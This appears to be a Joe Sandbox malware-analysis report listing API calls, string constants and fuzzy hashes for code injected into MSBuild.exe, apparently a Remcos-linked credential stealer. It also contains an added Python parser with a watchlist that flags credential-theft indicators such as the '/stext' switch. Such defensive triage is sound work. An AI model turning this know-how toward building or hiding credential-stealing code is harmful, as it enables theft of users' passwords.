                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset
                                                                                                                                            • String ID: BINARY
                                                                                                                                            • API String ID: 2221118986-907554435
                                                                                                                                            • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                                                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                            • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                                                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmp
                                                                                                                                            • String ID: /stext
                                                                                                                                            • API String ID: 2081463915-3817206916
                                                                                                                                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmp
                                                                                                                                            • String ID: .v
                                                                                                                                            • API String ID: 2081463915-2572790428
                                                                                                                                            • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                            • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
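The function records above (API call lists, the '$'-joined API ID and String ID, and the per-function Opcode/Instruction fuzzy hashes) are what an analyst mines when triaging the injected MSBuild.exe image: the _wcsicmp record referencing "/stext" is the switch NirSoft's password-recovery utilities take to dump results to a text file, which fits the report's Chrome/Firefox credential-theft signatures; the FindFirstFile record referencing "*.*" and "index.dat" walks the WinINet/Internet Explorer history index; the GetTempPathW/GetTempFileNameW record creates a uniquely named file under %TEMP%. The following parser is an added example and not part of the Joe Sandbox report: it reads records in the extracted text form shown here, pulls out the call sites and fields, and flags the constants and API pairs just named. SAMPLE is an excerpt of three records from this page (Opcode ID / Instruction ID lines dropped for brevity); the watchlists and the NirSoft reading of "/stext" are the author's triage heuristics, not fields of the report.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records (extracted text form) and triage them.
Added example, not part of the report. SAMPLE is an excerpt of three records from this
page; the parser keeps any '• Key: value' field it meets. Watchlists are the author's."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SAMPLE = """
APIs
• GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
• GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
• String ID:
• Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
Strings
Similarity
• API ID: FileFindFirst
• String ID: *.*$index.dat
• Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
APIs
Strings
Similarity
• API ID: _wcsicmp
• String ID: /stext
• Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
"""

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR", optionally prefixed with
# "Part of subcall function ADDR: " when the call is made from a callee.
API_RE = re.compile(
    r"^(?:Part of subcall function ([0-9A-Fa-f]{8}):\s*)?"
    r"(.+?)\.([A-Za-z0-9]+)(?:\(.*\))?,?\s*ref:\s*([0-9A-Fa-f]{8})\s*$")
FIELD_RE = re.compile(r"^([A-Za-z ]+?):\s*(.*)$")  # "• Key: value" lines


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                          # address of the call site
    subcall_of: Optional[str] = None  # callee address when the call is indirect


@dataclass
class FuncRecord:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    @property
    def strings(self) -> List[str]:
        # Joe Sandbox joins a function's referenced string constants with '$'
        return [s for s in self.fields.get("String ID", "").split("$") if s]


def parse_records(text: str) -> List[FuncRecord]:
    records, cur, section = [], FuncRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADINGS:
            section = line
            continue
        body = line.lstrip("•").strip()
        m = API_RE.match(body) if section == "APIs" else None
        if m:
            sub, name, mod, ref = m.groups()
            cur.apis.append(ApiCall(name, mod, ref, sub))
            continue
        f = FIELD_RE.match(body)
        if f:
            cur.fields[f.group(1)] = f.group(2)
            if f.group(1) == "Instruction Fuzzy Hash":  # always a record's last field
                records.append(cur)
                cur = FuncRecord()
    return records


# Triage heuristics (author's, not report fields); only constants seen in the records above.
STRING_WATCHLIST = {
    "/stext": "NirSoft password-recovery switch: dump results to a text file",
    "index.dat": "WinINet / Internet Explorer history and cache index",
}
API_WATCHLIST = {
    frozenset({"GetTempPathW", "GetTempFileNameW"}): "creates a uniquely named file under %TEMP%",
}


def triage(records: List[FuncRecord]) -> List[dict]:
    hits = []
    for r in records:
        names = {a.name for a in r.apis}
        why = [STRING_WATCHLIST[s] for s in r.strings if s in STRING_WATCHLIST]
        why += [v for k, v in API_WATCHLIST.items() if k <= names]
        if why:
            hits.append({"api_id": r.fields.get("API ID", ""),
                         "fuzzy": r.fields.get("Instruction Fuzzy Hash", ""), "why": why})
    return hits


if __name__ == "__main__":
    for h in triage(parse_records(SAMPLE)):
        print(h["api_id"] or "(no APIs)", "->", "; ".join(h["why"]), "|", h["fuzzy"][:16])
```

The Instruction Fuzzy Hash carried in each hit is the value to pivot on: the same hash appearing in another report's function records points at the same code in a different Remcos build, even when the process name and load address differ.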
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                            • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2445788494-0
                                                                                                                                            • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                            • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3150196962-0
                                                                                                                                            • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                            • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: malloc
                                                                                                                                            • String ID: failed to allocate %u bytes of memory
                                                                                                                                            • API String ID: 2803490479-1168259600
                                                                                                                                            • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                            • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                            • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                            • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0041BDDF
                                                                                                                                            • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcmpmemset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1065087418-0
                                                                                                                                            • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                            • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1381354015-0
                                                                                                                                            • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                            • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                            • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                            • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                            • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                            • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2154303073-0
                                                                                                                                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3150196962-0
                                                                                                                                            • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                            • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                            APIs
                                                                                                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$PointerRead
APIs
• GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
APIs
• FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
Similarity
• API ID: FreeLibrary
APIs
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
Similarity
• API ID: AddressProc$FileModuleName
APIs
• ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Similarity
• API ID: FileRead
APIs
• WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
Similarity
• API ID: FileWrite
APIs
• FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
Similarity
• API ID: FreeLibrary
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
Similarity
• API ID: CreateFile
APIs
• CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
Similarity
• API ID: CreateFile
APIs
• ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Similarity
• API ID: ??3@
APIs
• FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
Similarity
• API ID: FreeLibrary
APIs
• EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
Similarity
• API ID: EnumNamesResource
                                                                                                                                            APIs
                                                                                                                                            • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3664257935-0
                                                                                                                                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                            APIs
                                                                                                                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseFind
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1863332320-0
                                                                                                                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                            • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                            • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                            • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                            • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
